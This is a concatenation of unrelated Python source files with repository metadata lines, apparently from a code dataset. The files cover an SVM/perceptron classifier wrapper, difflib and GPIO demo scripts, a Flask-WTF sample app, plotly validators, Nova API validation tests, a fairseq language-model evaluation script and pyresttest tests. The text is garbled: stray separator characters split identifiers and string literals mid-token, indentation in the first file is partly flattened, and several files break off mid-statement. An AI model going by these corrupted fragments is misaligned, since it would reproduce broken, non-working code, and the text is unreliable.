from dtbutils import *
from perceptron import KernelLBRankPerceptron, polynomial_kernel
import numpy as np
import cPickle
class Classifier(object):
def __init__(self, param={'model':'', 'pref':'def', 'verbose':False,\
'classtype':'classifier'}):
self._param = param
# Model
self._classtype = param['classtype']
self._modelname = param['model']
self._pref = param['pref']
self._model = None
self._numex_train = 0
self._numex_dev = 0
self._max_feat = 0
self._labs = {}
self._svmclassp = "-s 0 -t 1 -d 3 -g 0.1 -r 0.0 -e 1.0 -c 1.0 -q"
self._svmstrucp = "-z p -t 1 -d 3 -s 0.1 -r 0.0 -e 1.0 -c 0.05 -b 0"
#
# Make a decision using a model on an example, A feature vector is:
# ((feat1,val1), (feat3,val3), ...)
# Where each index corresponds to a feature in the model alphabet. Output
# a list of tuples (class/idx, score) sorted by decending score.
#
    def score(self, feats):
        # Make a decision with the loaded model. Behaviour depends on the
        # model class:
        #   'classifier' - feats is one sparse vector; returns the predicted
        #                  integer label (libsvm).
        #   'structured' - feats is a list of candidate vectors; returns the
        #                  index of the candidate with the highest svm-light
        #                  decision value.
        #   'percrank'   - feats is a list of candidate vectors; returns the
        #                  index preferred by the rank perceptron.
        m = self._model
        if self._classtype == "classifier":
            x,_ = svm.gen_svm_nodearray(dict(feats))
            return int(svm.libsvm.svm_predict(m, x))
        elif self._classtype == "structured":
            # Scan all candidates, keeping the best decision value seen.
            maxscore = -sys.maxint
            maxidx = None
            for idx in range(len(feats)):
                dec_val = svmlight.classify(m, [(0, feats[idx])])
                if dec_val > maxscore:
                    maxscore = dec_val
                    maxidx = idx
            return maxidx
        elif self._classtype == "percrank":
            # The perceptron works on feature-id sets; values are dropped.
            X = [None]*len(feats)
            Xisd = [0]*len(feats)
            Xisd[0] = 1
            for idx in range(len(feats)):
                X[idx] = set([f for f,v in feats[idx]])
            dec_vals = m.project(X, Xisd)
            return dec_vals.index(max(dec_vals))
#
# Reads a ranking problem.
#
    def read_rank_problem(self, ef):
        # Read an svm-light style ranking file (``glab qid:N f:v ...``) and
        # turn each query group into one-vs-all ranking constraints:
        # the highest-labelled candidate (X1) versus all others (X2).
        # Returns (X1, X1isdef, X2, X2isdef, Xidx, bline) where the *isdef
        # lists mark the default (first) candidate of each group, Xidx maps
        # each group to its X2 row indices, and bline counts groups whose
        # default candidate is already the gold one (a baseline score).
        efile = codecs.open(ef, 'r', 'ascii')
        qid = None
        allex = []
        rex = []
        print >> sys.stderr, "Reading ranking problem..."
        for line in efile:
            fields = line.rstrip().split(' ')
            glab = int(fields.pop(0))
            cqid = int(fields.pop(0).split(":")[1])
            feats = []
            for field in fields:
                f,v = field.split(":")
                #feats.append((int(f),float(v)))
                feats.append(int(f))
            # Only feature ids are kept; values are discarded.
            feats = set(feats)
            if qid == None:
                qid = cqid
                rex = [(glab, feats)]
            elif qid == cqid:
                rex.append((glab, feats))
            else:
                # Query id changed: close the previous group.
                allex.append(rex)
                qid = cqid
                rex = [(glab, feats)]
        allex.append(rex)
        efile.close()
        # Only supports a one-vs-all ranking (highest glab over rest)
        print >> sys.stderr, "Generating ranking constraints...",
        X1 = []
        X2 = []
        X2cnt = 0
        Xidx = []
        X1isdef = []
        X2isdef = []
        bline = 0
        for rex in allex:
            glabs = [glab for glab,_ in rex]
            gidx = glabs.index(max(glabs))
            cidx = []
            for i in range(len(rex)):
                glab,feats = rex[i]
                if i == 0 and glab == 1:
                    bline += 1
                if i == gidx:
                    X1.append(feats)
                    if i == 0:
                        X1isdef.append(1)
                    else:
                        X1isdef.append(0)
                else:
                    cidx.append(X2cnt)
                    X2.append(feats)
                    if i == 0:
                        X2isdef.append(1)
                    else:
                        X2isdef.append(0)
                    X2cnt += 1
            Xidx.append(tuple(cidx))
        print >> sys.stderr, X2cnt
        return X1, X1isdef, X2, X2isdef, Xidx, bline
#
# Append stream of examples to file. Feature vectors are as follows:
# [(feat1, val1), (feat3, val3), ..., (featn, valn)]
#
def write_examples(self, examples, mode="train"):
exstream = codecs.open(self._modelname+"/"+self._pref+"."+mode,\
'a', 'ascii')
# Classification examples over a single line. Label and feature vector:
# 2 0:1 2:1 5:1
# 5 1:1 2:1 4:1
if self._classtype == "classifier":
for glab,feats in examples:
if mode == 'train':
self._numex_train += 1
self._max_feat = max(self._max_feat, feats[-1][0])
self._labs[glab] = True
else:
self._numex_dev += 1
print >> exstream, glab, \
" ".join([str(f)+":"+str(v) for f,v in feats])
# Structured binary examples.
# 1 qid:1 1:1 2:-1 5:-1
# 0 qid:1 1:-1 2:1 4:-1
elif self._classtype in ["structured", "percrank"]:
for idxg,ex in examples:
if mode == 'train':
| self._numex_train += 1
qid = self._numex_train
else:
self._numex_dev += 1
qid = self._numex_dev
for idx in range(len(ex)):
feats = ex[idx]
| if mode == 'train':
self._max_feat = max(self._max_feat, feats[-1][0])
if idxg == idx:
glab = 1
else:
glab = 0
print >> exstream, glab, 'qid:'+str(qid),\
" ".join([str(f)+":"+str(v) \
for f,v in feats])
exstream.close()
#
# Train model.
#
    def train_model(self):
        # Train the model from the previously written train/dev files.
        # 'classifier' and 'structured' shell out to the external libsvm /
        # svm-light binaries ($LIBSVM, $SVMLIGHT); 'percrank' trains the
        # in-process rank perceptron and pickles its support vectors.
        if self._classtype in ["structured", "percrank"]:
            # Ranking problems are binary one-vs-all, so only label 1 exists.
            self._labs = {1:True}
        print >> sys.stderr, "Training model with",\
            self._numex_train,"examples,", self._max_feat+1, "features and",\
            len(self._labs), "labels."
        if self._numex_dev:
            print >> sys.stderr, "Also with", self._numex_dev,"dev examples."
        ef = self._modelname+"/"+self._pref+".train"
        df = self._modelname+"/"+self._pref+".dev"
        mf = self._modelname+"/"+self._pref+".model"
        if self._classtype == "classifier":
            os.system("$LIBSVM/svm-train "+self._svmclassp+" "+ef+" "+mf)
        elif self._classtype == "structured":
            os.system("$SVMLIGHT/svm_learn "+self._svmstrucp+" "+ef+" "+mf)
        elif self._classtype == "percrank":
            X1,X1isdef,X2,X2isdef,Xidx,bline = self.read_rank_problem(ef)
            X1dev,X1devisdef,X2dev,X2devisdef,Xdevidx,devbline = \
                self.read_rank_problem(df)
            m = KernelLBRankPerceptron(kernel=polynomial_kernel, T=10, B=0)
            m.fit(X1, X1isdef, X2, X2isdef, Xidx, X1dev, X1devisdef, X2dev,\
                X2devisdef, Xdevidx, gm=False, bl=devbline)
            mfile = open(mf, 'wb')
            cPickle.dump([m.sv_a,m.sv_1,m.sv_2,m.bias], mfile, -1)
            mfile.close()
#
# Load model.
#
def load_model(self):
if not os.path.isfile(self._modelname+"/"+self._pref+".model"):
return False
if self._classtype == "classifier":
self._model = svmutil.svm_load_model(self._modelname+\
"/"+self._pref+".model")
elif self._classtype == "structured":
self._model = svmlight.read_model(self._modelname+\
|
jasonwee/asus-rt-n14uhp-mrtg | src/lesson_text/difflib_seq.py | Python | apache-2.0 | 948 | 0.006329 | import difflib
s1 = [1, 2, 3, 5, 6, 4]
s2 = [2, 3, 5, 4, 6, 1]
print('Initial data:')
print('s1 =', s1)
print('s2 =', s2)
print('s1 == s2:', s1 == s2)
print()
matcher = difflib.SequenceMatcher(None, s1, s2)
for tag, i1, i2, j1, j2 in reversed(matcher.get_opcodes()):
if tag == 'delete':
print('Remove {} from positions [{}:{}]'.format(s1[i1:i2], i1, i2))
print(' before =', s1)
del s1[i1:i2]
elif tag == 'equal':
print('s1[{}:{}] and s2[{}:{}] are the same'.format(i1, i2, j1, j2))
elif tag == 'insert':
print('Insert {} from s2[{}:{}] into s1 at {}'.format(s2[j1:j2], j1, j2, i1))
print(' before =', s1)
s1[i1:i2] = s2[j1:j2]
elif tag == 'replace': |
print(('Replace {} from s1[{}:{}] '
'with {} from s2[{}:{}]').format(
s1[i1:i2], | i1, i2, s2[j1:j2], j1, j2))
print(' before =', s1)
s1[i1:i2] = s2[j1:j2]
print(' after = ', s1, '\n')
print('s1 == s2:', s1 == s2)
|
lightningwolf/Flask-JqueryUiBootstrap | SAMPLE_PROJECT/wtf-app.py | Python | mit | 1,192 | 0.003356 | #!/usr/bin/env python
# coding=utf8
from flask import Flask, render_template
from flask.ext.jqueryuibootstrap import JqueryUiBootstrap
from flask.ext.wtf import (
Form,
RecaptchaField,
)
from wtforms import (
TextField,
HiddenField,
ValidationError,
)
from wtforms.validators import (
Required,
)
app = Flask(__name__)
JqueryUiBootstrap(app)
app.config['SECRET_KEY'] = 'devkey'
app.config['RECAPTCHA_PUBLIC_KEY'] = '6Lfol9cSAAAAADAkodaYl9wvQCwBMr3qGR_PPHcw'
class ExampleForm(Form):
    """Demo form: two text fields, a hidden field that always fails
    validation, and a reCAPTCHA field."""
    # Restored: the first description literal was split by a stray
    # dataset separator ("description= | '...'").
    field1 = TextField('First Field', description='This is field one.')
    field2 = TextField('Second Field', description='This is field two.',
                       validators=[Required()])
    hidden_field = HiddenField('You cannot see this', description='Nope')
    recaptcha = RecaptchaField('A sample recaptcha field')
    def validate_hidden_field(form, field):
        # Inline WTForms validator; deliberately always errors so the demo
        # page shows a validation failure.
        raise ValidationError('Always wrong')
@app.route('/', methods=('GET', 'POST',))
def index():
    """Render the demo form; return "PASSED" once it validates on POST."""
    form = ExampleForm()
    if form.validate_on_submit():
        # Restored: the literal was corrupted to "PAS | SED" by a stray
        # dataset separator.
        return "PASSED"
    return render_template('example.html', form=form)
# Launch Flask's built-in development server when run directly.
if '__main__' == __name__:
    app.run(debug=True)
|
Spinmob/spinmob | _plot_complex.py | Python | gpl-3.0 | 207 | 0.024155 | from . import _plotting_mess
data = _plot | ting_mess.complex_data
databoxes = _plotting_mess.complex_databoxes
files = _plotting_mess.complex_ | files
function = _plotting_mess.complex_function |
plotly/python-api | packages/python/plotly/plotly/validators/layout/title/_pad.py | Python | mit | 945 | 0.001058 | import _plotly_utils.basevalidators
class PadValidator(_plotly_utils.basevalidators.CompoundValidator):
    """Validator for the compound ``layout.title.pad`` property.

    NOTE: the ``data_docs`` string below was corrupted by stray dataset
    separator characters ("| r", "alo | ng"); it is restored here to the
    standard generated plotly wording.
    """
    def __init__(self, plotly_name="pad", parent_name="layout.title", **kwargs):
        super(PadValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            data_class_str=kwargs.pop("data_class_str", "Pad"),
            data_docs=kwargs.pop(
                "data_docs",
                """
            b
                The amount of padding (in px) along the bottom
                of the component.
            l
                The amount of padding (in px) on the left side
                of the component.
            r
                The amount of padding (in px) on the right side
                of the component.
            t
                The amount of padding (in px) along the top of
                the component.
            """,
            ),
            **kwargs
        )
|
meigrafd/Sample-Code | interrupt_pause_script.py | Python | mit | 1,638 | 0.0116 | #!/usr/bin/python
from __future__ import print_function
import RPi.GPIO as GPIO
import time
import Queue # https://pymotw.com/2/Queue/
#GPIO pins
Taster1 = 24
Taster2 = 27
# GPIO-Nummer als Pinreferenz waehlen
GPIO.setmode(GPIO.BCM)
# GPIO vom SoC als Input deklarieren und Pull-Down Widerstand aktivieren
#PULL = GPIO.PUD_DOWN #GPIO -> GND
PULL = GPIO.PUD_UP #GPIO -> 3V3
GPIO.setup(Taster1, GPIO.IN, pull_up_down=PULL)
GPIO.setup(Taster2, GPIO.IN, pull_up_down=PULL)
# Dictionary definieren. http://www.tutorialspoint.com/python/python_dictionary.htm
dictionary = {}
dictionary['pause'] = False
queue = Queue.Queue()
# Script pausieren/blockieren/beschaeftigen
def Pause():
    # Busy-wait (1 s polling) until interrupt_event() clears the shared
    # 'pause' flag in ``dictionary``.
    while dictionary['pause'] == True:
        time.sleep(1)
# ISR
def interrupt_event(pin):
    """GPIO edge-detect callback: button 1 enqueues a pause request,
    button 2 clears the pause flag so the main loop resumes."""
    if pin == Taster1:
        queue.put(pin)
    elif pin == Taster2:
        print("Führe Script weiter aus")
        dictionary['pause'] = False
try:
    # Register edge-detect interrupts: react to rising edges, install the
    # ISR ``interrupt_event`` and debounce the pins (bouncetime in ms).
    # (Comment and the first print below were corrupted by stray dataset
    # separator characters and are restored here.)
    GPIO.add_event_detect(Taster1, GPIO.RISING, callback=interrupt_event, bouncetime=200)
    GPIO.add_event_detect(Taster2, GPIO.RISING, callback=interrupt_event, bouncetime=200)
    # keep script running
    while True:
        time.sleep(0.5)
        if not queue.empty():
            job = queue.get()
            if job == Taster1:
                print("Pausiere Script")
                dictionary['pause'] = True
                Pause()
                print("...puh... Im super heavy busy...")
except (KeyboardInterrupt, SystemExit):
    # Release the GPIO pins on Ctrl-C / termination.
    GPIO.cleanup()
    print("\nQuit\n")
rahulunair/nova | nova/tests/unit/test_api_validation.py | Python | apache-2.0 | 47,979 | 0.000333 | # Copyright 2013 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import re
import fixtures
from jsonschema import exceptions as jsonschema_exc
import six
from nova.api.openstack import api_version_request as api_version
from nova.api import validation
from nova.api.validation import parameter_types
from nova.api.validation import validators
from nova import exception
from nova import test
from nova.tests.unit.api.openstack import fakes
# Query-string schema used by FakeQueryParametersController: 'foo' is a
# single-valued UUID parameter, 'foos' is multi-valued, underscore-prefixed
# parameters are multi-valued, and unknown keys are tolerated.
query_schema = {
    'type': 'object',
    'properties': {
        'foo': parameter_types.single_param({'type': 'string',
                                             'format': 'uuid'}),
        'foos': parameter_types.multi_params({'type': 'string'})
    },
    'patternProperties': {
        "^_": parameter_types.multi_params({'type': 'string'})},
    'additionalProperties': True
}
class FakeQueryParametersController(object):
    """Controller stub whose GET is validated by ``query_schema`` starting
    at microversion 2.3."""
    @validation.query_schema(query_schema, '2.3')
    def get(self, req):
        # Return the distinct query-parameter names seen after validation.
        return list(set(req.GET.keys()))
class RegexFormatFakeController(object):
    """Controller stub with a body schema using the ``regex`` format."""
    schema = {
        'type': 'object',
        'properties': {
            'foo': {
                'format': 'regex',
            },
        },
    }
    @validation.schema(request_body_schema=schema)
    def post(self, req, body):
        # Reaching the body means jsonschema accepted the request.
        return 'Validation succeeded.'
class FakeRequest(object):
    """Stand-in WSGI request pinned at API microversion 2.1."""
    api_version_request = api_version.APIVersionRequest("2.1")
    environ = {}
    legacy_v2 = False
    def is_legacy_v2(self):
        # True when the request targets the legacy v2 compatibility API.
        return self.legacy_v2
class ValidationRegex(test.NoDBTestCase):
    """Tests for parameter_types._build_regex_range character-range output."""
    def test_build_regex_range(self):
        # this is much easier to think about if we only use the ascii
        # subset because it's a printable range we can think
        # about. The algorithm works for all ranges.
        def _get_all_chars():
            for i in range(0x7F):
                yield six.unichr(i)
        self.useFixture(fixtures.MonkeyPatch(
            'nova.api.validation.parameter_types._get_all_chars',
            _get_all_chars))
        # note that since we use only the ascii range in the tests
        # we have to clear the cache to recompute them.
        parameter_types._reset_cache()
        r = parameter_types._build_regex_range(ws=False)
        self.assertEqual(r, re.escape('!') + '-' + re.escape('~'))
        # if we allow whitespace the range starts earlier
        r = parameter_types._build_regex_range(ws=True)
        self.assertEqual(r, re.escape(' ') + '-' + re.escape('~'))
        # excluding a character will give us 2 ranges
        r = parameter_types._build_regex_range(ws=True, exclude=['A'])
        self.assertEqual(r,
                         re.escape(' ') + '-' + re.escape('@') +
                         'B' + '-' + re.escape('~'))
        # inverting which gives us all the initial unprintable characters.
        r = parameter_types._build_regex_range(ws=False, invert=True)
        self.assertEqual(r,
                         re.escape('\x00') + '-' + re.escape(' '))
        # excluding characters that create a singleton. Naively this would be:
        # ' -@B-BD-~' which seems to work, but ' -@BD-~' is more natural.
        r = parameter_types._build_regex_range(ws=True, exclude=['A', 'C'])
        self.assertEqual(r,
                         re.escape(' ') + '-' + re.escape('@') +
                         'B' + 'D' + '-' + re.escape('~'))
        # ws=True means the positive regex has printable whitespaces,
        # so the inverse will not. The inverse will include things we
        # exclude.
        r = parameter_types._build_regex_range(
            ws=True, exclude=['A', 'B', 'C', 'Z'], invert=True)
        self.assertEqual(r,
                         re.escape('\x00') + '-' + re.escape('\x1f') + 'A-CZ')
class APIValidationTestCase(test.NoDBTestCase):
    """Base class for schema-validation tests.

    Subclasses set ``post_schema``; setUp builds a stub ``self.post``
    decorated with that schema, and ``check_validation_error`` asserts that
    calling a method raises ValidationError with the expected HTTP 400
    detail. (Two lines corrupted by stray dataset separators — ``sel | f``
    and ``req | =req`` — are restored here.)
    """
    post_schema = None
    def setUp(self):
        super(APIValidationTestCase, self).setUp()
        self.post = None
        if self.post_schema is not None:
            @validation.schema(request_body_schema=self.post_schema)
            def post(req, body):
                return 'Validation succeeded.'
            self.post = post
    def check_validation_error(self, method, body, expected_detail, req=None):
        if not req:
            req = FakeRequest()
        try:
            method(body=body, req=req)
        except exception.ValidationError as ex:
            self.assertEqual(400, ex.kwargs['code'])
            if isinstance(expected_detail, list):
                self.assertIn(ex.kwargs['detail'], expected_detail,
                              'Exception details did not match expected')
            elif not re.match(expected_detail, ex.kwargs['detail']):
                self.assertEqual(expected_detail, ex.kwargs['detail'],
                                 'Exception details did not match expected')
        except Exception as ex:
            self.fail('An unexpected exception happens: %s' % ex)
        else:
            # No exception at all means validation wrongly accepted the body.
            self.fail('Any exception does not happen.')
class FormatCheckerTestCase(test.NoDBTestCase):
    """Tests for the custom jsonschema 'name' format checkers."""
    def _format_checker(self, format, value, error_message):
        # Assert that checking ``value`` against ``format`` raises a
        # FormatError whose cause is InvalidName with ``error_message``.
        format_checker = validators.FormatChecker()
        exc = self.assertRaises(jsonschema_exc.FormatError,
                                format_checker.check, value, format)
        self.assertIsInstance(exc.cause, exception.InvalidName)
        self.assertEqual(error_message,
                         exc.cause.format_message())
    def test_format_checker_failed_with_non_string_name(self):
        error_message = ("An invalid 'name' value was provided. The name must "
                         "be: printable characters. "
                         "Can not start or end with whitespace.")
        self._format_checker("name", " ", error_message)
        self._format_checker("name", None, error_message)
    def test_format_checker_failed_name_with_leading_trailing_spaces(self):
        error_message = ("An invalid 'name' value was provided. "
                        "The name must be: printable characters with at "
                        "least one non space character")
        self._format_checker("name_with_leading_trailing_spaces",
                            None, error_message)
class MicroversionsSchemaTestCase(APIValidationTestCase):
def setUp(self):
super(MicroversionsSchemaTestCase, self).setUp()
schema_v21_int = {
'type': 'object',
'properties': {
'foo': {
'type': 'integer',
}
}
}
schema_v20_str = copy.deepcopy(schema_v21_int)
schema_v20_str['properties']['foo'] = {'type': 'string'}
@validation.schema(schema_v20_str, '2.0', '2.0')
@validation.schema(schema_v21_int, '2.1')
def post(req, body):
return 'Validation succeeded.'
self.post = post
def test_validate_v2compatible_request(self):
req = FakeRequest()
req.legacy_v2 = True
self.assertEqual(self.post(body={'foo': 'bar'}, req=req),
'Validation succeeded.')
detail = ("Invalid input for field/attribute foo. Value: 1. "
"1 is not of type 'string'")
self.check_validation_error(self.post, body={'foo': 1},
expected_detail=detail, req=req)
def test_validate_v21_request(self):
req = FakeRequest()
self.assertEqual(self.post(body={'foo': 1}, req=req),
'Validation succeeded.')
detail = ("Invalid input for field/attribute foo. Va |
hfp/libxsmm | samples/deeplearning/sparse_training/fairseq/fairseq_cli/eval_lm.py | Python | bsd-3-clause | 8,725 | 0.001375 | #!/usr/bin/env python3 -u
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Evaluate the perplexity of a trained language model.
"""
import logging
import math
import os
import torch
from fairseq import checkpoint_utils, options, tasks, utils
from fairseq.data import LMContextWindowDataset
from fairseq.logging import progress_bar
from fairseq.logging.meters import StopwatchMeter, TimeMeter
from fairseq.sequence_scorer import SequenceScorer
from fairseq import distributed_utils
logging.basicConfig(
format='%(asctime)s | %(levelname)s | %(name)s | %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO,
)
logger = logging.getLogger('fairseq_cli.eval_lm')
class WordStat(object):
    """Running per-word statistics gathered during LM evaluation."""

    def __init__(self, word, is_bpe):
        self.word = word
        self.is_bpe = is_bpe
        self.log_prob = 0
        self.next_word_prob = 0
        self.count = 0
        self.missing_next_words = 0

    def add(self, log_prob, next_word_prob):
        """Accumulate this occurrence's log-prob and, when available, the
        log-prob of the following word (given context ending here). The
        next word may be missing at example boundaries or for non-final
        subword units; those occurrences are tallied separately."""
        if next_word_prob is None:
            self.missing_next_words += 1
        else:
            self.next_word_prob += next_word_prob
        self.log_prob += log_prob
        self.count += 1

    def __str__(self):
        covered = self.count - self.missing_next_words
        return '{}\t{}\t{}\t{}\t{}\t{}'.format(self.word, self.count,
                                               self.log_prob, self.is_bpe,
                                               self.next_word_prob, covered)
def main(parsed_args, **unused_kwargs):
assert parsed_args.path is not None, '--path required for evaluation!'
if torch.cuda.is_available() and not parsed_args.cpu:
torch.cuda.set_device(parsed_args.device_id)
utils.import_user_module(parsed_args)
logger.info(parsed_args)
use_cuda = torch.cuda.is_available() and not parsed_args.cpu
task = tasks.setup_task(parsed_args)
# Load ensemble
logger.info('loading model(s) from {}'.format(parsed_args.path))
models, args = checkpoint_utils.load_model_ensemble(
parsed_args.path.split(os.pathsep),
arg_overrides=eval(parsed_args.model_overrides),
task=task,
suffix=getattr(parsed_args, "checkpoint_suffix", ""),
)
for arg in vars(parsed_args).keys():
if arg not in {
'self_target', 'future_target', 'past_target', 'tokens_per_sample',
'output_size_dictionary', 'add_bos_token',
}:
setattr(args, arg, getattr(parsed_args, arg))
# reduce tokens per sample by the required context window size
args.tokens_per_sample -= args.context_window
task = tasks.setup_task(args)
# Load dataset splits
task.load_dataset(args.gen_subset)
dataset = task.dataset(args.gen_subset)
if args.context_windo | w > 0:
dataset = LMContextWindowDataset(
dataset=dataset,
tokens_per_sample=args.tokens_per_sample,
context_window=args.context_window,
pad_idx=tas | k.source_dictionary.pad(),
)
logger.info('{} {} {} examples'.format(args.data, args.gen_subset, len(dataset)))
# Optimize ensemble for generation and set the source and dest dicts on the model (required by scorer)
for model in models:
model.prepare_for_inference_(args)
if args.fp16:
model.half()
if use_cuda:
model.cuda()
assert len(models) > 0
logger.info('num. model params: {}'.format(sum(p.numel() for p in models[0].parameters())))
itr = task.get_batch_iterator(
dataset=dataset,
max_tokens=args.max_tokens or 36000,
max_sentences=args.max_sentences,
max_positions=utils.resolve_max_positions(*[
model.max_positions() for model in models
]),
ignore_invalid_inputs=True,
num_shards=args.num_shards,
shard_id=args.shard_id,
num_workers=args.num_workers,
).next_epoch_itr(shuffle=False)
progress = progress_bar.progress_bar(
itr,
log_format=args.log_format,
log_interval=args.log_interval,
default_log_format=('tqdm' if not args.no_progress_bar else 'none'),
)
gen_timer = StopwatchMeter()
scorer = SequenceScorer(task.target_dictionary, args.softmax_batch)
score_sum = 0.
count = 0
if args.remove_bpe is not None:
if args.remove_bpe == 'sentencepiece':
raise NotImplementedError
else:
bpe_cont = args.remove_bpe.rstrip()
bpe_toks = {
i
for i in range(len(task.source_dictionary))
if task.source_dictionary[i].endswith(bpe_cont)
}
bpe_len = len(bpe_cont)
else:
bpe_toks = None
bpe_len = 0
word_stats = dict()
wps_meter = TimeMeter()
for sample in progress:
if 'net_input' not in sample:
continue
sample = utils.move_to_cuda(sample) if use_cuda else sample
gen_timer.start()
hypos = scorer.generate(models, sample)
gen_timer.stop(sample['ntokens'])
for i, hypos_i in enumerate(hypos):
hypo = hypos_i[0]
sample_id = sample['id'][i]
tokens = hypo['tokens']
tgt_len = tokens.numel()
pos_scores = hypo['positional_scores'].float()
if args.add_bos_token:
assert hypo['tokens'][0].item() == task.target_dictionary.bos()
tokens = tokens[1:]
pos_scores = pos_scores[1:]
skipped_toks = 0
if bpe_toks is not None:
for i in range(tgt_len - 1):
if tokens[i].item() in bpe_toks:
skipped_toks += 1
pos_scores[i + 1] += pos_scores[i]
pos_scores[i] = 0
inf_scores = pos_scores.eq(float('inf')) | pos_scores.eq(float('-inf'))
if inf_scores.any():
logger.info(
'skipping tokens with inf scores:',
task.target_dictionary.string(tokens[inf_scores.nonzero()])
)
pos_scores = pos_scores[(~inf_scores).nonzero()]
score_sum += pos_scores.sum().cpu()
count += pos_scores.numel() - skipped_toks
if args.output_word_probs or args.output_word_stats:
w = ''
word_prob = []
is_bpe = False
for i in range(len(tokens)):
w_ind = tokens[i].item()
w += task.source_dictionary[w_ind]
if bpe_toks is not None and w_ind in bpe_toks:
w = w[:-bpe_len]
is_bpe = True
else:
word_prob.append((w, pos_scores[i].item()))
next_prob = None
ind = i + 1
while ind < len(tokens):
if pos_scores[ind].item() != 0:
next_prob = pos_scores[ind]
break
ind += 1
word_stats.setdefault(w, WordStat(w, is_bpe)).add(pos_scores[i].item(), next_prob)
is_bpe = False
w = ''
if args.output_word_probs:
logger.info(
str(int(sample_id)) + " "
+ ('\t'.join('{} [{:2f}]'.format(x[0], x[1]) for x in word_prob))
)
wps_meter.update(sample['ntokens'])
progress.log({'wps': round(wps_meter.avg)})
avg_nll_loss = -score_sum / count / math.log(2) # convert to base 2
logger.info('Evaluated {} tokens in {:.1 |
holdenweb/pyresttest | pyresttest/test_validators.py | Python | apache-2.0 | 13,922 | 0.001796 | import unittest
import validators
from binding import Context
class ValidatorsTest(unittest.TestCase):
""" Testing for validators and extract functions """
    def test_validatortest_exists(self):
        # 'exists' is true for any value except None; falsy values such as
        # 0 and False still count as existing.
        func = validators.VALIDATOR_TESTS['exists']
        self.assertTrue(func('blah'))
        self.assertTrue(func(0))
        self.assertTrue(func('False'))
        self.assertTrue(func(False))
        self.assertFalse(func(None))
    def test_validatortest_not_exists(self):
        # 'not_exists' is the complement: only None is considered missing.
        func = validators.VALIDATOR_TESTS['not_exists']
        self.assertFalse(func('blah'))
        self.assertFalse(func(0))
        self.assertFalse(func('False'))
        self.assertTrue(func(None))
    def test_dict_query(self):
        """ Test actual query logic """
        mydict = {'key': {'val': 3}}
        query = 'key.val'
        val = validators.MiniJsonExtractor.query_dictionary(query, mydict)
        self.assertEqual(3, val)
        array = [1,2,3]
        mydict = {'key': {'val': array}}
        val = validators.MiniJsonExtractor.query_dictionary(query, mydict)
        self.assertEqual(array, val)
        # Missing key path yields None rather than raising.
        mydict = {'key': {'v': 'pi'}}
        val = validators.MiniJsonExtractor.query_dictionary(query, mydict)
        self.assertEqual(None, val)
        # Array test
        query = 'key.val.1'
        mydict = {'key': {'val': array}}
        val = validators.MiniJsonExtractor.query_dictionary(query, mydict)
        self.assertEqual(array[1], val)
        # Error cases
        query = 'key.val.5'
        mydict = {'key': {'val': array}}
        val = validators.MiniJsonExtractor.query_dictionary(query, mydict)
        self.assertEqual(None, val)
        # Non-numeric index into a list is also None.
        query = 'key.val.pi'
        mydict = {'key': {'val': array}}
        val = validators.MiniJsonExtractor.query_dictionary(query, mydict)
        self.assertEqual(None, val)
        # Return the first object?
        query = 'key.0'
        mydict = {'key': {'val': array}}
        val = validators.MiniJsonExtractor.query_dictionary(query, mydict)
        self.assertEqual(None, val)
        # Mix array array and dictionary
        mydict = [{'key': 'val'}]
        query = '0.key'
        val = validators.MiniJsonExtractor.query_dictionary(query, mydict)
        self.assertEqual('val', val)
    def test_parse_extractor_minijson(self):
        # Parse a mini-JSON-path extractor, run it with and without a
        # context, check invalid JSON raises, then test templated queries.
        config = 'key.val'
        extractor = validators.MiniJsonExtractor.parse(config)
        myjson = '{"key": {"val": 3}}'
        context = Context()
        context.bind_variable('node', 'val')
        extracted = extractor.extract(body=myjson)
        self.assertEqual(3, extracted)
        self.assertEqual(extracted, extractor.extract(body=myjson, context=context))
        try:
            val = extractor.extract(body='[31{]')
            self.fail("Should throw exception on invalid JSON")
        except ValueError:
            pass
        # Templating
        config = {'template': 'key.$node'}
        extract = validators.MiniJsonExtractor.parse(config)
        self.assertEqual(3, extract.extract(myjson, context=context))
    def test_header_extractor(self):
        # Header extraction is case-insensitive and yields None for a
        # header that is absent.
        query = 'content-type'
        extractor = validators.HeaderExtractor.parse(query)
        headers = {'content-type': 'application/json'}
        extracted = extractor.extract(body='blahblah', headers=headers)
        self.assertEqual(headers[query], extracted)
        # Test case-insensitivity
        query = 'content-Type'
        extractor = validators.HeaderExtractor.parse(query)
        extracted = extractor.extract(body='blahblah', headers=headers)
        self.assertEqual(headers[query.lower()], extracted)
        headers = {'foo': 'bar'}
        extracted = extractor.extract(body='blahblah', headers=headers)
        self.assertEqual(None, extracted)
    def test_parse_header_extractor(self):
        # Registry lookup for 'header' returns a HeaderExtractor flagged as
        # header-based, not body-based.
        query = 'content-type'
        extractor = validators.parse_extractor('header', query)
        self.assertTrue(isinstance(extractor, validators.HeaderExtractor))
        self.assertTrue(extractor.is_header_extractor)
        self.assertFalse(extractor.is_body_extractor)
    def test_abstract_extractor_parse(self):
        """ Test parsing a basic abstract extractor """
        ext = validators.AbstractExtractor()
        ext = validators.AbstractExtractor.configure_base('val', ext)
        self.assertEqual('val', ext.query)
        self.assertEqual(False, ext.is_templated)
        # A {'template': ...} config flags the extractor as templated.
        validators.AbstractExtractor.configure_base({'template': '$var'}, ext)
        self.assertEqual(True, ext.is_templated)
        self.assertEqual('$var', ext.query)
    def test_abstract_extractor_string(self):
        """ Test abstract extractor to_string method """
        ext = validators.AbstractExtractor()
        ext.is_templated = True
        ext.is_header_extractor = True
        ext.is_body_extractor = True
        ext.query = 'gooblyglah'
        ext.extractor_type = 'bleh'
        ext.args = {'cheesy': 'poofs'}
        # str(ext) must render type, query, templating flag and args.
        expected = "Extractor type: {0}, query: {1}, is_templated: {2}, args: {3}".format(ext.extractor_type, ext.query, ext.is_templated, ext.args)
        self.assertEqual(expected, str(ext))
def test_abstract_extractor_templating(self):
""" Test that abstract extractors template the query """
